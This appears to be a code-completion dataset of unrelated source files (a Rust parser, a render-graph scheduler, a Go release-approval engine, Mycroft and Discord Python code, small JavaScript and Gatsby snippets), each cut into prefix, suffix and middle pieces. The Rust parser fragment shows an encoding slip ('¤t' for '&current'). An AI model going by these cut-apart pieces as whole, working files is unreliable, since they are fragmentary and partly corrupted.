"Encountered impossible literal during parsing: {:?}",
first_child.tokens()
),
} | let mut arguments: Vec<Expression> = vec![];
for current in token.relevant_children() {
match current.as_rule() {
Rule::non_empty_identifier => name = Some(current.as_str().to_string()),
Rule::expression => arguments.push(parse_expression(¤t)),
_ => parsing_catch_all(¤t, "function"),
}
}
match name {
Some(name) => Expression::Function(name, arguments, Span::from_pest(token.as_span())),
_ => unreachable!("Encountered impossible function during parsing: {:?}", token.as_str()),
}
}
fn parse_array(token: &Token) -> Expression {
let mut elements: Vec<Expression> = vec![];
for current in token.relevant_children() {
match current.as_rule() {
Rule::expression => elements.push(parse_expression(¤t)),
_ => parsing_catch_all(¤t, "array"),
}
}
Expression::Array(elements, Span::from_pest(token.as_span()))
}
pub fn parse_arg_value(token: &Token) -> Expression {
let current = token.first_relevant_child();
match current.as_rule() {
Rule::expression => parse_expression(¤t),
_ => unreachable!("Encountered impossible value during parsing: {:?}", current.tokens()),
}
}
fn parse_string_literal(token: &Token) -> String {
let current = token.first_relevant_child();
match current.as_rule() {
Rule::string_content => unescape_string_literal(current.as_str()).into_owned(),
_ => unreachable!(
"Encountered impossible string content during parsing: {:?}",
current.tokens()
),
}
}
#[allow(clippy::trivial_regex)]
fn unescape_string_literal(original: &str) -> Cow<'_, str> {
static STRING_LITERAL_UNESCAPE_RE: Lazy<Regex> = Lazy::new(|| Regex::new(r#"\\(")"#).unwrap());
static STRING_LITERAL_BACKSLASHES_RE: Lazy<Regex> = Lazy::new(|| Regex::new(r#"\\\\"#).unwrap());
static STRING_LITERAL_NEWLINE_RE: Lazy<Regex> = Lazy::new(|| Regex::new(r#"\\n"#).unwrap());
match STRING_LITERAL_UNESCAPE_RE.replace_all(original, "\"") {
Cow::Owned(s) => match STRING_LITERAL_NEWLINE_RE.replace_all(&s, "\n") {
Cow::Owned(s) => STRING_LITERAL_BACKSLASHES_RE.replace_all(&s, "\\").into_owned().into(),
Cow::Borrowed(s) => STRING_LITERAL_BACKSLASHES_RE.replace_all(s, "\\").into_owned().into(),
},
Cow::Borrowed(s) => match STRING_LITERAL_NEWLINE_RE.replace_all(s, "\n") {
Cow::Owned(s) => STRING_LITERAL_BACKSLASHES_RE.replace_all(&s, "\\").into_owned().into(),
Cow::Borrowed(s) => STRING_LITERAL_BACKSLASHES_RE.replace_all(s, "\\").into_owned().into(),
},
}
} | }
fn parse_function(token: &Token) -> Expression {
let mut name: Option<String> = None; |
mod.rs | pub mod population;
pub mod generation;
pub mod niche;
pub mod genocide;
pub mod survival;
/// Genome is what will actually be evolved through the engine;
/// it is whatever data structure should be optimized
pub mod genome {
use super::environment::Envionment;
use std::marker::Sized;
use std::sync::{Arc, RwLock};
pub trait Genome<T, E>
where
T: ?Sized + Send + Sync,
E: ?Sized + Send + Sync
{
/// Crossover is the process of taking two types (T) and returning
/// a new type, this is done through some defined form of
/// mutation using the config type, or through crossover
/// where parts of one type are given to parts of the other and that resulting
/// type is returned
fn crossover(one: &T, two: &T, env: Arc<RwLock<E>>, crossover_rate: f32) -> Option<T>
where
T: Sized,
E: Envionment + Sized;
/// This is a measure of an evolutionary type's structure or topology - depending on what is being evolved.
/// This is needed to split the members into their respective species - essentially it is
/// a measure of how far away two types are from each other in a genetic
/// sense. Think of something like how similar humans are to dolphins; this is a way to quantify that.
fn distance(one: &T, two: &T, env: Arc<RwLock<E>>) -> f32;
/// Genome needs to have a base implementation in order for one of the population options to be satisfied
///
/// This can probably be given a generic default implementation if the user doesn't want to
/// implement it for their problem.
fn base(_: &mut E) -> T
where T: Sized
{
panic!("Base not implemented.");
}
}
}
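// A minimal sketch of implementing `Genome` for a plain bit string (with
// `use std::sync::{Arc, RwLock};` in scope). `MyEnv` and the
// crossover/distance choices below are illustrative assumptions, not part of
// this crate:
//
// struct MyEnv;
// impl environment::Envionment for MyEnv {}
//
// impl genome::Genome<Vec<bool>, MyEnv> for Vec<bool> {
//     fn crossover(one: &Vec<bool>, two: &Vec<bool>, _env: Arc<RwLock<MyEnv>>, _rate: f32) -> Option<Vec<bool>> {
//         // Single-point crossover: head of `one`, tail of `two`.
//         let point = one.len() / 2;
//         Some(one[..point].iter().chain(two[point..].iter()).cloned().collect())
//     }
//     fn distance(one: &Vec<bool>, two: &Vec<bool>, _env: Arc<RwLock<MyEnv>>) -> f32 {
//         // Hamming distance as a crude measure of genetic similarity.
//         one.iter().zip(two.iter()).filter(|(a, b)| a != b).count() as f32
//     }
// }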
/// Environment represents overall settings for a genome; this can be statistics to be
/// tracked through evolution, or things like mutation rates or global counters. This is
/// injected into functions throughout the generational process so it is accessible globally as a
/// center point for the evolution. Note - if this is used mutably in crossover or mutation,
/// it will slow down the optimization process because it has to be locked during writes, so
/// keeping the variables in implementations of this trait readonly is preferred, though it isn't a big deal.
pub mod environment {
pub trait Envionment {
/// Reset can be used to reset the environment after a certain event occurs,
/// if not this is an empty default implementation
fn | (&mut self) { }
}
}
/// Problem is the actual problem to be solved.
/// This is wrapped in an Arc pointer so that the problem is not
/// copied across threads. This was done intentionally because I wanted to be able to
/// represent supervised, unsupervised, and general reinforcement learning problems. This
/// means that if you are using a supervised system with a large dataset to analyze, and the
/// dataset is stored in the problem (as it should be), without an Arc pointer this large dataset would
/// be copied multiple times and take up massive amounts of memory. The Arc allows us to keep only one version
/// of the problem and share that between threads. Note - this means everything in the problem and all its data
/// is explicitly readonly.
pub mod problem {
pub trait Problem<T> {
/// empty can be a new for Self, or some sort of default value,
/// just needed to create a population with base parameters
fn empty() -> Self;
/// Solve is what actually solves the problem , given a solver (the genome type)
/// use the data in the type implementing the problem to solve the problem and return
/// the member's score. The result of this function is the member's fitness score
fn solve(&self, member: &mut T) -> f32;
}
} | reset |
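// A sketch of a supervised `Problem` over a shared, readonly dataset. The
// `XorProblem` type, its fields, and `MyNet::forward` are hypothetical names
// used for illustration only:
//
// struct XorProblem { inputs: Vec<[f32; 2]>, targets: Vec<f32> }
//
// impl problem::Problem<MyNet> for XorProblem {
//     fn empty() -> Self {
//         XorProblem { inputs: Vec::new(), targets: Vec::new() }
//     }
//     fn solve(&self, member: &mut MyNet) -> f32 {
//         // Fitness is the negated total error over the dataset; `self` is
//         // never mutated, which is why it can live behind an Arc.
//         let error: f32 = self.inputs.iter().zip(self.targets.iter())
//             .map(|(x, t)| (member.forward(x) - t).abs())
//             .sum();
//         -error
//     }
// }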
__init__.py |
from mycroft import MycroftSkill
from mycroft.messagebus import Message
import json
from .lib import MqttService
class MessageListener(MycroftSkill):
# Initializing the skill
def initialize(self):
self.log.info("Initializing Skill MessageListener")
self.add_event('speak', self.handler_speak)
self.add_event('enclosure.mouth.viseme_list', self.handler_enclosure_mouth_viseme_list)
self.mqttservice = MqttService("VisemeSkill", "mosquitto", self.log.info)
self.prepare_for_webapp_message()
def prepare_for_webapp_message(self):
self.mqttservice.loopStart()
self.mqttservice.subscribe("faceme/webapp", self.message_recieved)
# acquiring speak data (the text mycroft will output):
def | (self, message):
self.text = message.data.get('utterance')
# acquiring mouth_viseme_list data:
def handler_enclosure_mouth_viseme_list(self, message):
self.startTime = message.data.get('start')
self.visemes = message.data.get('visemes')
# Call method send_visemelist(build_json()) to send our now complete dataset via mqtt in a json string format
self.send_visemelist(self.build_json())
# Function to convert the strings acquired from the messagebus into a json string and return it:
def build_json(self):
data_set = {"text": self.text, "start": self.startTime, "visemes": self.visemes}
json_dump = json.dumps(data_set)
return json_dump
def send_visemelist(self, payload):
self.mqttservice.subscribe("faceme/mycroft/visemes", self.message_recieved) # Printet on_message von MQTT_service
# Publish the payload we created in build_json(); it is transmitted correctly
self.mqttservice.publish("faceme/mycroft/visemes", payload)
def message_recieved(self, message):
self.log.info("Es ist eine Nachricht angekommen: " + str(message.payload) + " topic: " + message.topic)
if message.topic == "faceme/webapp":
self.webapp_message(message)
def webapp_message(self, message):
decoded_message = str(message.payload.decode("utf-8"))
msg = json.loads(decoded_message)
self.bus.emit(Message(msg["type"], msg["data"]))
def shutdown(self):
self.mqttservice.loopStop()
self.mqttservice.disconnect()
def create_skill():
return MessageListener()
###### Unused Function #######
# Function adds the duration each viseme should be displayed to it's array so the data would be: "visemes": [[CODE, END_TIME, DURATION], ...]
#def addDuration(self):
#self.visemes[0].append(self.visemes[0][1]) # Do we need this?
#for x in range(len(self.visemes)):
#if x < (len(self.visemes)-1):
#duration = self.visemes[x+1][1] - self.visemes[x][1]
#self.visemes[x+1].append(duration) | handler_speak |
Get.js |
const db = require("../../../database/connection");
async function | () {
const conn = await db.connect();
const [rows] = await conn.query(`SELECT * FROM tbl_empresas INNER JOIN tbl_contato_empresa ON tbl_empresas.cnpj = tbl_contato_empresa.cnpj ORDER BY empresa ASC`);
return rows;
}
module.exports = { getCompanies } | getCompanies |
Image.tsx | import * as React from 'react'
import { StaticQuery, graphql } from 'gatsby'
import Img, { FluidObject } from 'gatsby-image'
import styled from '@emotion/styled'
interface ImageProps {
filename: string
alt?: string
className?: string
}
const StyledImg = styled(Img)`
&.diImage {
margin-top: 200px;
}
width: 100%;
`
export const Image: React.FC<ImageProps> = props => (
<StaticQuery
query={graphql`
query {
images: allFile(filter: { relativeDirectory: { glob: "images" } }) {
edges {
node {
relativePath
name
childImageSharp {
sizes(maxWidth: 600) {
...GatsbyImageSharpSizes
}
}
}
}
}
}
`}
render={data => {
// eslint-disable-next-line @typescript-eslint/no-explicit-any
const image = data.images.edges.find((n: Record<string, any>) => {
return n.node.relativePath.includes(props.filename)
})
if (!image) {
return <div>No image found :(</div>
}
const imageSizes: FluidObject = image.node.childImageSharp.sizes
return <StyledImg alt={props.alt} fluid={imageSizes} className={props.className} /> | />
) | }} |
collect.rs | use std::cmp::max;
use std::hash::Hash;
use std::ops::Range;
use fnv::FnvHashMap;
use chain::{BufferChains, Chain, ImageChains, Link, LinkNode};
use node::{Node, State};
use resource::{Buffer, Image, Resource};
use schedule::{FamilyId, Queue, QueueId, Schedule, Submission, SubmissionId};
use Id;
/// Placeholder for synchronization type.
#[derive(Clone, Copy, Debug)]
pub struct Unsynchronized;
/// Result of node scheduler.
#[derive(Debug)]
pub struct Chains<S = Unsynchronized> {
/// Contains submissions for nodes spread among queue schedule.
pub schedule: Schedule<S>,
/// Contains all buffer chains.
pub buffers: BufferChains,
/// Contains all image chains.
pub images: ImageChains,
}
#[derive(PartialEq, PartialOrd, Eq, Ord)]
struct Fitness {
transfers: usize,
wait_factor: usize,
}
struct ResolvedNode {
id: usize,
family: FamilyId,
queues: Range<usize>,
rev_deps: Vec<usize>,
buffers: Vec<(usize, State<Buffer>)>,
images: Vec<(usize, State<Image>)>,
}
impl Default for ResolvedNode {
fn default() -> Self {
ResolvedNode {
id: 0,
family: FamilyId(0),
queues: 0..0,
rev_deps: Vec::new(),
buffers: Vec::new(),
images: Vec::new(),
}
}
}
struct ResolvedNodeSet {
nodes: Vec<ResolvedNode>,
queues: Vec<QueueId>,
buffers: Vec<Id>,
images: Vec<Id>,
}
struct ChainData<R: Resource> {
chain: Chain<R>,
last_link_wait_factor: usize,
current_link_wait_factor: usize,
current_family: Option<FamilyId>,
}
impl<R: Resource> Default for ChainData<R> {
fn default() -> Self {
ChainData {
chain: Chain::new(),
last_link_wait_factor: 0,
current_link_wait_factor: 0,
current_family: None,
}
}
}
struct QueueData {
queue: Queue<Unsynchronized>,
wait_factor: usize,
}
/// Calculate automatic `Chains` for nodes.
/// This function tries to find the most appropriate schedule for node execution.
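///
/// A sketch of a typical call, assuming a fixed budget of two queues per
/// family (the closure maps a `FamilyId` to its queue count):
///
/// ```ignore
/// let chains = collect(nodes, |_family| 2);
/// ```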
pub fn collect<Q>(nodes: Vec<Node>, max_queues: Q) -> Chains
where
Q: Fn(FamilyId) -> usize,
{
// Resolve nodes into a form faster to work with.
let (nodes, mut unscheduled_nodes) = resolve_nodes(nodes, max_queues);
let mut ready_nodes = Vec::new();
// Chains.
let mut images: Vec<ChainData<Image>> = fill(nodes.images.len());
let mut buffers: Vec<ChainData<Buffer>> = fill(nodes.buffers.len());
// Schedule
let mut schedule = Vec::with_capacity(nodes.queues.len());
for i in 0..nodes.queues.len() {
schedule.push(QueueData {
queue: Queue::new(nodes.queues[i]),
wait_factor: 0,
});
}
for node in &nodes.nodes {
if unscheduled_nodes[node.id] == 0 {
ready_nodes.push(node);
}
}
let mut scheduled = 0;
if nodes.queues.len() == 1 {
// With a single queue, wait_factor is always the number of scheduled nodes, and
// transfers is always zero. Thus, we only need dependency resolution.
while let Some(node) = ready_nodes.pop() {
schedule_node(
&mut ready_nodes,
&mut unscheduled_nodes,
&nodes,
node,
0,
scheduled,
scheduled,
&mut schedule,
&mut images,
&mut buffers,
);
scheduled += 1;
}
} else {
while !ready_nodes.is_empty() {
// Among ready nodes find best fit.
let (fitness, qid, index) = ready_nodes
.iter()
.enumerate()
.map(|(index, &node)| {
let (fitness, qid) = fitness(node, &mut images, &mut buffers, &mut schedule);
(fitness, qid, index)
}).min()
.unwrap();
let node = ready_nodes.swap_remove(index);
schedule_node(
&mut ready_nodes,
&mut unscheduled_nodes,
&nodes,
node,
qid,
fitness.wait_factor,
scheduled,
&mut schedule,
&mut images,
&mut buffers,
);
scheduled += 1;
}
}
assert_eq!(scheduled, nodes.nodes.len(), "Dependency loop found!");
Chains {
schedule: reify_schedule(schedule),
buffers: reify_chain(&nodes.buffers, buffers),
images: reify_chain(&nodes.images, images),
}
}
fn fill<T: Default>(num: usize) -> Vec<T> {
let mut vec = Vec::with_capacity(num);
for _ in 0..num {
vec.push(T::default());
}
vec
}
struct LookupBuilder<I: Hash + Eq + Copy> {
forward: FnvHashMap<I, usize>,
backward: Vec<I>,
}
impl<I: Hash + Eq + Copy> LookupBuilder<I> {
fn new() -> LookupBuilder<I> {
LookupBuilder {
forward: FnvHashMap::default(),
backward: Vec::new(),
}
}
fn forward(&mut self, id: I) -> usize {
if let Some(&id_num) = self.forward.get(&id) {
id_num
} else {
let id_num = self.backward.len();
self.backward.push(id);
self.forward.insert(id, id_num);
id_num
}
}
}
fn resolve_nodes<Q>(nodes: Vec<Node>, max_queues: Q) -> (ResolvedNodeSet, Vec<usize>)
where
Q: Fn(FamilyId) -> usize,
{
let node_count = nodes.len();
let mut unscheduled_nodes = fill(nodes.len());
let mut reified_nodes: Vec<ResolvedNode> = fill(nodes.len());
let mut node_ids = LookupBuilder::new();
let mut queues = LookupBuilder::new();
let mut buffers = LookupBuilder::new();
let mut images = LookupBuilder::new();
let mut family_full = FnvHashMap::default();
for node in nodes {
let family = node.family;
if !family_full.contains_key(&family) {
let count = max_queues(family);
assert!(count > 0, "Cannot create a family with 0 max queues.");
for i in 0..count {
queues.forward(QueueId::new(family, i));
}
let full_range = queues.forward(QueueId::new(family, 0))
..queues.forward(QueueId::new(family, count - 1)) + 1;
family_full.insert(family, full_range);
}
let id = node_ids.forward(node.id);
assert!(id < node_count, "Dependency not found."); // This implies a dep is not there.
let unscheduled_count = node.dependencies.len();
for dep in node.dependencies {
// Duplicated dependencies work fine, since they push two rev_deps entries and add two
// to unscheduled_nodes.
reified_nodes[node_ids.forward(dep)].rev_deps.push(id);
}
unscheduled_nodes[id] = unscheduled_count;
// We set these manually, and notably, do *not* touch rev_deps.
reified_nodes[id].id = id;
reified_nodes[id].family = node.family;
reified_nodes[id].queues = family_full[&family].clone();
reified_nodes[id].buffers = node
.buffers
.into_iter()
.map(|(k, v)| (buffers.forward(k), v))
.collect();
reified_nodes[id].images = node
.images
.into_iter()
.map(|(k, v)| (images.forward(k), v))
.collect();
}
(
ResolvedNodeSet {
nodes: reified_nodes,
queues: queues.backward,
buffers: buffers.backward,
images: images.backward,
},
unscheduled_nodes,
)
}
fn | <R: Resource>(ids: &[Id], vec: Vec<ChainData<R>>) -> FnvHashMap<Id, Chain<R>> {
let mut map = FnvHashMap::with_capacity_and_hasher(vec.len(), Default::default());
for (chain, &i) in vec.into_iter().zip(ids) {
map.insert(i, chain.chain);
}
map
}
fn reify_schedule(vec: Vec<QueueData>) -> Schedule<Unsynchronized> {
let mut schedule = Schedule::new();
for queue_data in vec.into_iter() {
schedule.set_queue(queue_data.queue);
}
schedule
}
fn fitness(
node: &ResolvedNode,
images: &mut Vec<ChainData<Image>>,
buffers: &mut Vec<ChainData<Buffer>>,
schedule: &mut Vec<QueueData>,
) -> (Fitness, usize) {
let mut transfers = 0;
let mut wait_factor_from_chains = 0;
// Collect minimal waits required and resource transfers count.
for &(id, _) in &node.buffers {
let chain = &buffers[id];
if chain
.current_family
.map_or(false, |family| family != node.family)
{
transfers += 1;
}
wait_factor_from_chains = max(wait_factor_from_chains, chain.last_link_wait_factor);
}
for &(id, _) in &node.images {
let chain = &images[id];
if chain
.current_family
.map_or(false, |family| family != node.family)
{
transfers += 1;
}
wait_factor_from_chains = max(wait_factor_from_chains, chain.last_link_wait_factor);
}
// Find best queue for node.
let (wait_factor_from_queue, queue) = node
.queues
.clone()
.map(|index| (schedule[index].wait_factor, index))
.min()
.unwrap();
(
Fitness {
transfers,
wait_factor: max(wait_factor_from_chains, wait_factor_from_queue),
},
queue,
)
}
fn schedule_node<'a>(
ready_nodes: &mut Vec<&'a ResolvedNode>,
unscheduled_nodes: &mut Vec<usize>,
nodes: &'a ResolvedNodeSet,
node: &ResolvedNode,
queue: usize,
wait_factor: usize,
submitted: usize,
schedule: &mut Vec<QueueData>,
images: &mut Vec<ChainData<Image>>,
buffers: &mut Vec<ChainData<Buffer>>,
) {
let ref mut queue_data = schedule[queue];
queue_data.wait_factor = max(queue_data.wait_factor, wait_factor + 1);
let sid = queue_data
.queue
.add_submission(node.id, wait_factor, submitted, Unsynchronized);
let submission = queue_data.queue.submission_mut(sid).unwrap();
for &(id, state) in &node.buffers {
add_to_chain(
nodes.buffers[id],
node.family,
&mut buffers[id],
sid,
submission,
state,
);
}
for &(id, state) in &node.images {
add_to_chain(
nodes.images[id],
node.family,
&mut images[id],
sid,
submission,
state,
);
}
for &rev_dep in &node.rev_deps {
unscheduled_nodes[rev_dep] -= 1;
if unscheduled_nodes[rev_dep] == 0 {
ready_nodes.push(&nodes.nodes[rev_dep]);
}
}
}
fn add_to_chain<R, S>(
id: Id,
family: FamilyId,
chain_data: &mut ChainData<R>,
sid: SubmissionId,
submission: &mut Submission<S>,
state: State<R>,
) where
R: Resource,
{
let node = LinkNode { sid, state };
chain_data.current_family = Some(family);
chain_data.current_link_wait_factor = max(
submission.wait_factor() + 1,
chain_data.current_link_wait_factor,
);
    let chain = &mut chain_data.chain;
let chain_len = chain.links().len();
let append = match chain.last_link_mut() {
Some(ref mut link) if link.compatible(&node) => {
submission.set_link(id, chain_len - 1);
link.add_node(node);
None
}
Some(_) | None => {
submission.set_link(id, chain_len);
chain_data.last_link_wait_factor = chain_data.current_link_wait_factor;
Some(Link::new(node))
}
};
if let Some(link) = append {
chain.add_link(link);
}
}
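// Illustrative sketch of the wait-factor bookkeeping above, reduced to plain
// integers (hypothetical values): a submission waits at least as long as its
// queue's current factor and the factors demanded by the chains it touches,
// and the queue then advances one step past the submission just recorded.
#[cfg(test)]
mod wait_factor_sketch {
    use std::cmp::max;
    #[test]
    fn queue_advances_past_submission() {
        let (queue_factor, chain_factor) = (2usize, 3usize);
        // fitness: the node must wait for both its queue and its chains.
        let submission_factor = max(queue_factor, chain_factor);
        // schedule_node: the queue moves past the submission just added.
        let next_queue_factor = max(queue_factor, submission_factor + 1);
        assert_eq!(next_queue_factor, 4);
    }
}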
engine_schedule_rules.go | package approvalrulesprocessing
import (
"context"
"errors"
"fmt"
"strconv"
"strings"
"time"
"github.com/fullstaq-labs/sqedule/server/dbmodels"
"github.com/fullstaq-labs/sqedule/server/dbmodels/releasestate"
)
func (engine Engine) fetchScheduleRulePreviousOutcomes() (map[uint64]bool, error) {
outcomes, err := dbmodels.FindScheduleApprovalRuleOutcomes(engine.Db, engine.OrganizationID, engine.ReleaseBackgroundJob.ReleaseID)
if err != nil {
return nil, err
}
return indexScheduleRuleOutcomes(outcomes), nil
}
func (engine Engine) processScheduleRules(rulesetContents dbmodels.ApprovalRulesetContents, previousOutcomes map[uint64]bool, nAlreadyProcessed uint) (releasestate.State, uint, error) {
var nprocessed uint = 0
var totalRules uint = rulesetContents.NumRules()
for _, rule := range rulesetContents.ScheduleApprovalRules {
success, outcomeAlreadyRecorded, err := engine.processScheduleRule(rule, previousOutcomes)
if err != nil {
return releasestate.Rejected, nprocessed,
maybeFormatRuleProcessingError(err, "Error processing schedule rule org=%s, ID=%d: %w",
engine.OrganizationID, rule.ID, err)
}
nprocessed++
resultState, ignoredError := determineReleaseStateFromOutcome(success, rule.BindingMode, isLastRule(nAlreadyProcessed, nprocessed, totalRules))
engine.Db.Logger.Info(context.Background(),
"Processed schedule rule: org=%s, ID=%d, success=%t, ignoredError=%t, resultState=%s",
engine.OrganizationID, rule.ID, success, ignoredError, resultState)
if !outcomeAlreadyRecorded {
event, err := engine.createRuleProcessedEvent(resultState, ignoredError)
if err != nil {
return releasestate.Rejected, nprocessed,
fmt.Errorf("Error recording release event: %w", err)
}
err = engine.createScheduleRuleOutcome(rule, event, success)
if err != nil {
return releasestate.Rejected, nprocessed,
fmt.Errorf("Error recording schedule approval rule outcome: %w", err)
}
}
if resultState.IsFinal() {
return resultState, nprocessed, nil
}
}
return determineReleaseStateAfterProcessingRules(nAlreadyProcessed, nprocessed, totalRules),
nprocessed, nil
}
func determineReleaseStateAfterProcessingRules(nAlreadyProcessed uint, nprocessed uint, totalRules uint) releasestate.State {
if isLastRule(nAlreadyProcessed, nprocessed, totalRules) {
return releasestate.Approved
}
return releasestate.InProgress
}
func (engine Engine) processScheduleRule(rule dbmodels.ScheduleApprovalRule, previousOutcomes map[uint64]bool) (bool, bool, error) {
success, exists := previousOutcomes[rule.ID]
if exists {
return success, true, nil
}
// TODO: if there's an error, reject the release because the rules have errors
success, err := timeIsWithinSchedule(engine.ReleaseBackgroundJob.Release.CreatedAt, rule)
return success, false, err
}
func (engine Engine) createScheduleRuleOutcome(rule dbmodels.ScheduleApprovalRule, event dbmodels.ReleaseRuleProcessedEvent, success bool) error {
outcome := dbmodels.ScheduleApprovalRuleOutcome{
ApprovalRuleOutcome: dbmodels.ApprovalRuleOutcome{
BaseModel: dbmodels.BaseModel{
OrganizationID: engine.OrganizationID,
},
ReleaseRuleProcessedEventID: event.ReleaseEvent.ID,
Success: success,
},
ScheduleApprovalRuleID: rule.ApprovalRule.ID,
}
tx := engine.Db.Create(&outcome)
if tx.Error != nil {
return tx.Error
}
return nil
}
func indexScheduleRuleOutcomes(outcomes []dbmodels.ScheduleApprovalRuleOutcome) map[uint64]bool {
result := make(map[uint64]bool)
for _, outcome := range outcomes {
result[outcome.ScheduleApprovalRuleID] = outcome.Success
}
return result
}
func timeIsWithinSchedule(releaseTime time.Time, rule dbmodels.ScheduleApprovalRule) (bool, error) {
if rule.BeginTime.Valid {
		if !rule.EndTime.Valid {
			panic(fmt.Sprintf("ScheduleApprovalRule %d: BeginTime non-null, but EndTime null", rule.ApprovalRule.ID))
		}
parsedBeginTime, err := parseScheduleTime(releaseTime, rule.BeginTime.String)
if err != nil {
return false, fmt.Errorf("Error parsing begin time '%s': %w", rule.BeginTime.String, err)
}
parsedEndTime, err := parseScheduleTime(releaseTime, rule.EndTime.String)
if err != nil {
return false, fmt.Errorf("Error parsing end time '%s': %w", rule.EndTime.String, err)
}
if releaseTime.Before(parsedBeginTime) || releaseTime.After(parsedEndTime) {
return false, nil
}
}
if rule.DaysOfWeek.Valid {
parsedWeekDays, err := parseScheduleWeekDays(rule.DaysOfWeek.String)
if err != nil {
return false, fmt.Errorf("Error parsing days of week '%s': %w", rule.DaysOfWeek.String, err)
}
if !parsedWeekDays[releaseTime.Weekday()] {
return false, nil
}
}
if rule.DaysOfMonth.Valid {
parsedMonthDays, err := parseScheduleMonthDays(rule.DaysOfMonth.String)
if err != nil {
return false, fmt.Errorf("Error parsing days of month '%s': %w", rule.DaysOfMonth.String, err)
}
if !parsedMonthDays[releaseTime.Day()] {
return false, nil
}
}
if rule.MonthsOfYear.Valid {
parsedMonths, err := parseScheduleMonths(rule.MonthsOfYear.String)
if err != nil {
return false, fmt.Errorf("Error parsing months '%s': %w", rule.MonthsOfYear.String, err)
}
if !parsedMonths[releaseTime.Month()] {
return false, nil
}
}
return true, nil
}
// parseScheduleTime parses a ScheduleApprovalRule time string. It returns a `time.Time`
// whose date is equal to `date`, but whose time equals that of the time string.
//
// `str` has the format of `HH:MM[:SS]`.
//
// Example:
//
// parseScheduleTime(time.Date(2021, 2, 19, 0, 0, 0), "12:32") // => 2021-02-19 12:32
func parseScheduleTime(date time.Time, str string) (time.Time, error) {
components := strings.SplitN(str, ":", 3)
if len(components) < 2 {
return time.Time{}, errors.New("Invalid time format (HH:MM[:SS] expected)")
}
var hour, minute, second int64
var err error
hour, err = strconv.ParseInt(components[0], 10, 8)
if err != nil {
return time.Time{}, fmt.Errorf("Error parsing hour component: %w", err)
}
if hour < 0 || hour > 24 {
return time.Time{}, fmt.Errorf("Error parsing hour component: %d is not a valid value", hour)
}
minute, err = strconv.ParseInt(components[1], 10, 8)
if err != nil {
return time.Time{}, fmt.Errorf("Error parsing minute component: %w", err)
}
	if minute < 0 || minute > 59 {
return time.Time{}, fmt.Errorf("Error parsing minute component: %d is not a valid value", minute)
}
if len(components) == 3 {
second, err = strconv.ParseInt(components[2], 10, 8)
if err != nil {
return time.Time{}, fmt.Errorf("Error parsing second component: %w", err)
}
if second < 0 || second > 60 {
return time.Time{}, fmt.Errorf("Error parsing second component: %d is not a valid value", second)
}
} else {
second = 0
}
result := time.Date(date.Year(), date.Month(), date.Day(), int(hour), int(minute), int(second), 0, date.Location())
return result, nil
}
func parseScheduleWeekDays(str string) (map[time.Weekday]bool, error) {
result := make(map[time.Weekday]bool)
for _, day := range strings.Split(str, " ") {
switch strings.ToLower(day) {
case "1", "mon", "monday":
result[time.Monday] = true
case "2", "tue", "tuesday":
result[time.Tuesday] = true
case "3", "wed", "wednesday":
result[time.Wednesday] = true
case "4", "thu", "thursday":
result[time.Thursday] = true
case "5", "fri", "friday":
result[time.Friday] = true
case "6", "sat", "saturday":
result[time.Saturday] = true
case "0", "7", "sun", "sunday":
result[time.Sunday] = true
case "":
continue
default:
return nil, fmt.Errorf("'%s' is not a recognized weekday", day)
}
}
return result, nil
}
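// exampleScheduleParsing is an illustrative sketch (hypothetical values)
// showing the string formats the parsers in this file accept.
func exampleScheduleParsing() error {
	base := time.Date(2021, 2, 19, 0, 0, 0, 0, time.UTC)
	begin, err := parseScheduleTime(base, "08:30") // seconds are optional
	if err != nil {
		return err
	}
	days, err := parseScheduleWeekDays("mon wed 5") // names and numbers mix
	if err != nil {
		return err
	}
	fmt.Printf("begin=%v friday=%t\n", begin, days[time.Friday]) // friday=true
	return nil
}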
func parseScheduleMonthDays(str string) (map[int]bool, error) {
result := make(map[int]bool)
for _, day := range strings.Split(str, " ") {
if len(day) == 0 {
continue
}
dayInt, err := strconv.Atoi(day)
if err != nil {
return nil, fmt.Errorf("Error parsing month day '%s': %w", day, err)
}
		if dayInt < 1 || dayInt > 31 {
			return nil, fmt.Errorf("Month day '%s' is not a valid day", day)
		}
		result[dayInt] = true
}
return result, nil
}
func parseScheduleMonths(str string) (map[time.Month]bool, error) {
result := make(map[time.Month]bool)
for _, month := range strings.Split(str, " ") {
switch strings.ToLower(month) {
case "1", "jan", "january":
result[time.January] = true
case "2", "feb", "february":
result[time.February] = true
case "3", "mar", "march":
result[time.March] = true
case "4", "apr", "april":
result[time.April] = true
case "5", "may":
result[time.May] = true
case "6", "jun", "june":
result[time.June] = true
case "7", "jul", "july":
result[time.July] = true
case "8", "aug", "august":
result[time.August] = true
case "9", "sep", "september":
result[time.September] = true
case "10", "oct", "october":
result[time.October] = true
case "11", "nov", "november":
result[time.November] = true
case "12", "dec", "december":
result[time.December] = true
case "":
continue
default:
return nil, fmt.Errorf("'%s' is not a recognized month", month)
}
}
return result, nil
}
utils.py | from typing import Dict, List, Optional, Union
import contextlib
import asyncio
import discord
from discord.ext import pages
from database import DatabasePersonality, DatabaseDeck
# Set authorized guilds for slash command (return [] for global command - might take up to 1h to register)
def get_authorized_guild_ids():
return [550631040826343427]
async def personalities_name_searcher(ctx: discord.AutocompleteContext):
return [perso['name'] for perso in DatabasePersonality.get().get_all_personalities()
if ctx.value.lower() in perso['name'].lower()]
async def personalities_group_searcher(ctx: discord.AutocompleteContext):
return [group for group in DatabasePersonality.get().get_all_groups() if ctx.value.lower() in group.lower()]
async def wishlist_name_searcher(ctx: discord.AutocompleteContext):
ids = DatabaseDeck.get().get_wishlist(ctx.interaction.guild.id, ctx.interaction.user.id)
personalities = DatabasePersonality.get().get_multiple_perso_information(ids)
return [perso['name'] for perso in personalities
if ctx.value.lower() in perso['name'].lower()]
async def shopping_list_name_searcher(ctx: discord.AutocompleteContext):
ids = DatabaseDeck.get().get_shopping_list(ctx.interaction.guild.id, ctx.interaction.user.id)
personalities = DatabasePersonality.get().get_multiple_perso_information(ids)
return [perso['name'] for perso in personalities
if ctx.value.lower() in perso['name'].lower()]
async def deck_name_searcher(ctx: discord.AutocompleteContext):
ids = DatabaseDeck.get().get_user_deck(ctx.interaction.guild.id, ctx.interaction.user.id)
personalities = DatabasePersonality.get().get_multiple_perso_information(ids)
return [perso['name'] for perso in personalities
if ctx.value.lower() in perso['name'].lower()]
async def badges_name_searcher(ctx: discord.AutocompleteContext):
badges = DatabaseDeck.get().get_all_badges(ctx.interaction.guild.id)
return [badge['name'] for badge in badges if ctx.value.lower() in badge['name'].lower()]
class ConfirmView(discord.ui.View):
def __init__(self, authorized_user: discord.User, timeout: int = 60):
super().__init__(timeout=timeout)
self.is_accepted = None
self.authorized_user = authorized_user
